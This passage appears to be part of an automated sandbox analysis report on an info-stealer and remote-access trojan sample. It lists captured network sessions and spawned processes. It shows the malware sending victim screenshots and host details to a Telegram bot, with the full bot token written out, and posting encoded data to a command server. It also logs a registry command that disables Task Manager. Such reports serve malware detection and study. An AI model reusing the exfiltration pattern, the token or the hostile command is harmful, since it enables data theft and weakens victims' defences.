                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 21 07 23 10 02 56 2a 05 3d 54 3d 21 2a 00 27 02 3d 1e 2e 22 2f 01 28 2d 1c 0f 2d 01 25 0f 27 1d 39 44 3c 2a 24 11 20 3e 38 57 2a 0f 21 5e 00 1c 24 05 22 10 03 56 31 02 38 5a 27 20 02 5f 22 3d 15 17 2a 2d 22 08 3f 2a 2c 1d 3e 2b 27 53 3b 3c 3e 0f 25 17 03 00 2c 06 2a 5f 28 10 2a 54 0c 14 21 59 2e 2f 1a 5f 36 31 35 56 3d 31 27 05 27 3e 01 0a 24 5c 30 53 28 2c 0a 06 29 2d 3e 05 21 3c 0e 11 28 28 3a 5d 25 2d 2b 1e 3d 3e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!#V*=T=!*'=."/(--%'9D<*$ >8W*!^$"V18Z' _"=*-"?*,>+'S;<>%,*_(*T!Y./_615V=1''>$\0S(,)->!<((:]%-+=>"T")S0YP0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  133         192.168.2.4  50146        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:43.421741962 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:43.774360895 CET  1012               OUT        Data Raw: 55 5b 58 5e 5e 5a 56 53 54 58 57 54 54 56 5b 5f 59 58 5b 5f 52 53 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: U[X^^ZVSTXWTTV[_YX[_RSR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']2>' :^"$Z94_$((;'>Y;""8-<>9-!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:44.026223898 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:44.227874994 CET  778                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sveAT0nvD4RtN2r8AnkYT1D2irJdx%2BjQjT2%2FDS7li2JADjvzd30i9enQCuySTlqH6ff3dz8OvoHCZ1gI2g%2Fi%2F2bFb0C%2BF87yxRSF%2FhsCDZwVdma2aT14hSVcfxY997g1"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b982cabd4857-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1412682&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                  0           192.168.2.4  49736        34.117.59.81     443               7644  C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-10-27 18:22:27 UTC  61                 OUT        GET /ip HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-10-27 18:22:27 UTC  305                IN         HTTP/1.1 200 OK
                                                                                                                  date: Sun, 27 Oct 2024 18:22:26 GMT
                                                                                                                  content-type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 14
                                                                                                                  access-control-allow-origin: *
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-10-27 18:22:27 UTC  14                 IN         Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30
                                                                                                                  Data Ascii: 173.254.250.90


                                                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                  1           192.168.2.4  49737        34.117.59.81     443               7644  C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-10-27 18:22:27 UTC  42                 OUT        GET /country HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  2024-10-27 18:22:28 UTC  448                IN         HTTP/1.1 200 OK
                                                                                                                  access-control-allow-origin: *
                                                                                                                  Content-Length: 3
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  date: Sun, 27 Oct 2024 18:22:28 GMT
                                                                                                                  referrer-policy: strict-origin-when-cross-origin
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-10-27 18:22:28 UTC  3                  IN         Data Raw: 55 53 0a
                                                                                                                  Data Ascii: US


                                                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                  2           192.168.2.4  49738        149.154.167.220  443               7644  C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-10-27 18:22:29 UTC  255                OUT        POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary="68d30593-7ba0-4754-ba4f-858b55a2ddb4"
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 74846
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-10-27 18:22:29 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2024-10-27 18:22:29 UTC40OUTData Raw: 2d 2d 36 38 64 33 30 35 39 33 2d 37 62 61 30 2d 34 37 35 34 2d 62 61 34 66 2d 38 35 38 62 35 35 61 32 64 64 62 34 0d 0a
                                                                                                                  Data Ascii: --68d30593-7ba0-4754-ba4f-858b55a2ddb4
                                                                                                                  2024-10-27 18:22:29 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                  Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                  2024-10-27 18:22:29 UTC10OUTData Raw: 31 36 38 32 34 33 36 33 31 35
                                                                                                                  Data Ascii: 1682436315
                                                                                                                  2024-10-27 18:22:29 UTC131OUTData Raw: 0d 0a 2d 2d 36 38 64 33 30 35 39 33 2d 37 62 61 30 2d 34 37 35 34 2d 62 61 34 66 2d 38 35 38 62 35 35 61 32 64 64 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                  Data Ascii: --68d30593-7ba0-4754-ba4f-858b55a2ddb4Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                  2024-10-27 18:22:29 UTC133OUTData Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 31 31 30 34 63 61 61 38 39 39 33 31 32 31 66 32 66 35 61 65 62 64 62 36 66 63 39 64 62 64 33 31 64 33 39 65 66 66 38 63 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 33 36 34 33 33 39 0a 49 50 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                  Data Ascii: new user connect !ID: 1104caa8993121f2f5aebdb6fc9dbd31d39eff8cComment: Username: userPC Name: 364339IP: 173.254.250.90GEO: US
                                                                                                                  2024-10-27 18:22:29 UTC146OUTData Raw: 0d 0a 2d 2d 36 38 64 33 30 35 39 33 2d 37 62 61 30 2d 34 37 35 34 2d 62 61 34 66 2d 38 35 38 62 35 35 61 32 64 64 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                  Data Ascii: --68d30593-7ba0-4754-ba4f-858b55a2ddb4Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2024-10-27 18:22:30 UTC | 1557 | IN | HTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:30 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 1168
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":6298,"from":{"id":2088971373,"is_bot":true,"first_name":"Logs","username":"efim228proggvp_bot"},"chat":{"id":1682436315,"first_name":"efim","username":"efim228proggvp","type":"private"},"date":1730053350,"photo":[{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADcwADNgQ","file_unique_id":"AQADDMcxG19N8VB4","file_size":1043,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADbQADNgQ","file_unique_id":"AQADDMcxG19N8VBy","file_size":11910,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeAADNgQ","file_unique_id":"AQADDMcxG19N8VB9","file_size":49884,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeQADNgQ","file_unique_id":"AQADDMcxG19N8VB-","file_size":74253,"width":1280,"height":1024}],"caption":"new user connect !\nID: 1104caa8993121f2f5aebdb6fc9dbd31d3 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49749 | 34.117.59.81 | 443 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-27 18:22:50 UTC | 61 | OUT | GET /ip HTTP/1.1
Host: ipinfo.io
Connection: Keep-Alive
2024-10-27 18:22:50 UTC | 305 | IN | HTTP/1.1 200 OK
date: Sun, 27 Oct 2024 18:22:50 GMT
content-type: text/plain; charset=utf-8
Content-Length: 14
access-control-allow-origin: *
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-10-27 18:22:50 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30
Data Ascii: 173.254.250.90


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49752 | 34.117.59.81 | 443 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-27 18:22:51 UTC | 42 | OUT | GET /country HTTP/1.1
Host: ipinfo.io
2024-10-27 18:22:51 UTC | 448 | IN | HTTP/1.1 200 OK
access-control-allow-origin: *
Content-Length: 3
content-type: text/html; charset=utf-8
date: Sun, 27 Oct 2024 18:22:51 GMT
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-10-27 18:22:51 UTC | 3 | IN | Data Raw: 55 53 0a
Data Ascii: US


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49756 | 149.154.167.220 | 443 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-27 18:22:52 UTC | 255 | OUT | POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1
Content-Type: multipart/form-data; boundary="e62f1995-643c-4ec6-8579-e0af2437cb00"
Host: api.telegram.org
Content-Length: 74797
Expect: 100-continue
Connection: Keep-Alive
2024-10-27 18:22:53 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-27 18:22:53 UTC | 40 | OUT | Data Raw: 2d 2d 65 36 32 66 31 39 39 35 2d 36 34 33 63 2d 34 65 63 36 2d 38 35 37 39 2d 65 30 61 66 32 34 33 37 63 62 30 30 0d 0a
Data Ascii: --e62f1995-643c-4ec6-8579-e0af2437cb00
2024-10-27 18:22:53 UTC | 89 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-10-27 18:22:53 UTC | 10 | OUT | Data Raw: 31 36 38 32 34 33 36 33 31 35
Data Ascii: 1682436315
2024-10-27 18:22:53 UTC | 131 | OUT | Data Raw: 0d 0a 2d 2d 65 36 32 66 31 39 39 35 2d 36 34 33 63 2d 34 65 63 36 2d 38 35 37 39 2d 65 30 61 66 32 34 33 37 63 62 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
Data Ascii: --e62f1995-643c-4ec6-8579-e0af2437cb00Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2024-10-27 18:22:53 UTC | 84 | OUT | Data Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 31 31 30 34 63 61 61 38 39 39 33 31 32 31 66 32 66 35 61 65 62 64 62 36 66 63 39 64 62 64 33 31 64 33 39 65 66 66 38 63 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 4c 6f 67 20 73 69 7a 65 3a 20 37 33 32 37 31
Data Ascii: Log collectedID: 1104caa8993121f2f5aebdb6fc9dbd31d39eff8cComment: Log size: 73271
2024-10-27 18:22:53 UTC | 146 | OUT | Data Raw: 0d 0a 2d 2d 65 36 32 66 31 39 39 35 2d 36 34 33 63 2d 34 65 63 36 2d 38 35 37 39 2d 65 30 61 66 32 34 33 37 63 62 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
Data Ascii: --e62f1995-643c-4ec6-8579-e0af2437cb00Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2024-10-27 18:22:53 UTC | 1445 | IN | HTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:53 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 1056
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":6300,"from":{"id":2088971373,"is_bot":true,"first_name":"Logs","username":"efim228proggvp_bot"},"chat":{"id":1682436315,"first_name":"efim","username":"efim228proggvp","type":"private"},"date":1730053373,"photo":[{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADcwADNgQ","file_unique_id":"AQADDMcxG19N8VB4","file_size":1043,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADbQADNgQ","file_unique_id":"AQADDMcxG19N8VBy","file_size":11910,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeAADNgQ","file_unique_id":"AQADDMcxG19N8VB9","file_size":49884,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeQADNgQ","file_unique_id":"AQADDMcxG19N8VB-","file_size":74253,"width":1280,"height":1024}],"caption":"Log collected\nID: 1104caa8993121f2f5aebdb6fc9dbd31d39eff8 [TRUNCATED]



                                                                                                                  Target ID:0
                                                                                                                  Start time:14:22:02
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\PbfYaIvR5B.exe"
                                                                                                                  Imagebase:0x40000
                                                                                                                  File size:2'319'208 bytes
                                                                                                                  MD5 hash:7471EB468A1F0166167F369BEC578915
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:14:22:03
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe"
                                                                                                                  Imagebase:0x380000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "
                                                                                                                  Imagebase:0x240000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                                                  Imagebase:0x6f0000
                                                                                                                  File size:59'392 bytes
                                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:14:22:22
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\webHostnet/MsPortSavesruntime.exe"
                                                                                                                  Imagebase:0xcc0000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Imagebase:0x500000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:28
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Imagebase:0xcf0000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:29
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                                                                                                  Imagebase:0x350000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                                                                                                  Imagebase:0xa40000
                                                                                                                  File size:1'930'240 bytes
                                                                                                                  MD5 hash:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:14:22:26
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  Imagebase:0x7d0000
                                                                                                                  File size:1'930'240 bytes
